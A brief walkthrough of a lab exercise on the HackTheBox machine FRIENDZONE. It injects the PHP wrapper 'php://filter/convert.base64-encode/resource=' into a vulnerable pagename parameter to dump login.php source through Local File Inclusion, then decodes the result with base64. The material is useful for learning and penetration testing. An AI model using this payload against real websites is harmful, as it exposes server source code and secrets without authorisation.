You find a Local File Inclusion (LFI) running PHP, you’re able to leverage a PHP wrapper to convert the file to Base64, which you can then decode on your own machine to view the source-code of the page.

In this example, we’ll be using FRIENDZONE on HackTheBox.

---

Confirming LFI on our example

At the following URL, we found that we have LFI capabilities on the ?pagename parameter. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login

If we adjust ?pagename to the name of a php page that exists on the box, it will display that page beneath the “Something wen worng” text. For example, let’s view the contents of a php page named timestamp.php.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

---

Using Base64 Encoding to View Source Code

We can specify the following PHP Wrapper to encode a file in Base64.

php://filter/convert.base64-encode/resource=<filename>

Let’s inject that into our LFI, and specify the file we want to view the contents of (login.php)
https://administrator1.friendzone.red/dashboard.php?image_id=z.gif&pagename=php://filter/convert.base64-encode/resource=login

Now, let’s copy that returned Base64 and run the following command within Kali.

echo -n <Base64> | base64 -d

The results show us the source code of login.php! We could also rerun the above command with > login.php appended to save our own file.

---

That’s it! Super simple.